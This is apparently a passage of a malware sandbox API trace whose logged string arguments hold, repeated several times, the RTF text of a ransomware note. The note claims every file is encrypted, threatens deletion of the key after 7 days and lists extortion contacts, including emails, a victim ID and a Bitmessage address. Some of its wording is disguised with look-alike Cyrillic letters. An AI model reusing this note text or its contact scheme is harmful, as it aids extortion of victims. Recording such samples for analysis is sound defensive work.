tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.203] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.203] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2364cd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" 